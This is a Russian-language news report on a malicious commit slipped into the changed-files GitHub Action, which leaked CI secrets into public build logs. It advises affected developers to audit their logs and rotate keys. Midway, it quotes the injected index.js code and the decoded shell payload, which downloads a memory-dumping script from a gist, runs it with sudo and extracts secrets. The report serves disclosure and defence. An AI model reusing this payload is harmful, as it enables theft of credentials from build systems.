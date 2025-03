Выявлена подстановка вредоносного изменения в репозиторий проекта changed-files, развивающего обработчик к системе GitHub Actions, позволяющей автоматически запускать сценарии сборки и тестирования кодовых баз при срабатывании определённых событий, таких как поступление push-запроса, создание релизов, открытие/закрытие issue и открытие/закрытие pull-запросов. Обработчик changed-files использовался в 23 тысячах репозиториях, применяющих GitHub Actions в инфраструктуре непрерывной интеграции, для отслеживания изменения файлов и каталогов. В репозиторий changed-files было подставлено изменение 0e58ed8, добавляющее в файл index.js вредоносный код под предлогом переработки работы с файлами блокировок. При выполнении обработчика changed-files вредоносная вставка собирала присутствующие в сборочном окружении ключи доступа и прочие конфиденциальные данные. В качестве канала для передачи информации за пределы сборочного окружения использовался вывод записей в сборочный лог, который не в приватных репозиториях доступен публично. Всем разработчикам, пользовавшимся changed-files, требуется незамедлительно провести аудит своей инфраструктуры и проверить публичные логи систем интеграции на базе GitHub Actions на предмет утечки конфиденциальных данных. В случае использования скомпрометированной версии рекомендуется поменять ключи и провести анализ возможной компрометации своих систем. В настоящее время GitHub уже заблокировал репозиторий changed-files, но до этого около 14 часов вредоносные обновления были доступны для загрузки. Понять наличие вредоносного изменения можно по упоминанию "bash" в файле index.js: async function updateFeatures(token) { const {stdout, stderr} = await exec.getExecOutput('bash', ['-c', `echo "aWYgW1sgIiRPU1...ApmaQo=" | base64 -d > /tmp/run.sh && bash /tmp/run.sh`], { ignoreReturnCode: true, silent: true }); core.info(stdout); } В base64-последовательности содержался код: if [[ "$OSTYPE" == "linux-gnu" ]]; then B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0` echo $B64_BLOB else exit 0 fi Коммит был размещён от имени бота "renovate[bot]", предназначенного для автоматизации операций по обновлению зависимостей, но скорее всего имя данного бота использовано для запутывания следов, так как коммит был помечен как неверифицированный и не принадлежащий ни к одной ветке в репозитории changed-files. Подобные коммиты могут свидетельствовать о добавлении не в основной репозиторий, а в его форк (при прямом обращении через основной репозиторий в GitHub коммиты из форков остаются видимыми). Примечательно, что атакующий добился добавления вредоносного коммита почти во все git-тэги и релизы проекта changed-files, без отображения в git-логе коммитов в соответствующих ветках. В качестве предположений как он мог этого добиться упоминалось создание форка репозитория, размещения в нём вредоносного кода и обновления всех тегов в родительском репозитории с учётом нового SHA-хэша форка. По предположению другого разработчика атакующий добавил коммит в ветку main, перенаправил все теги на данную ветку, после чего откатил ветку main на предыдущий коммит.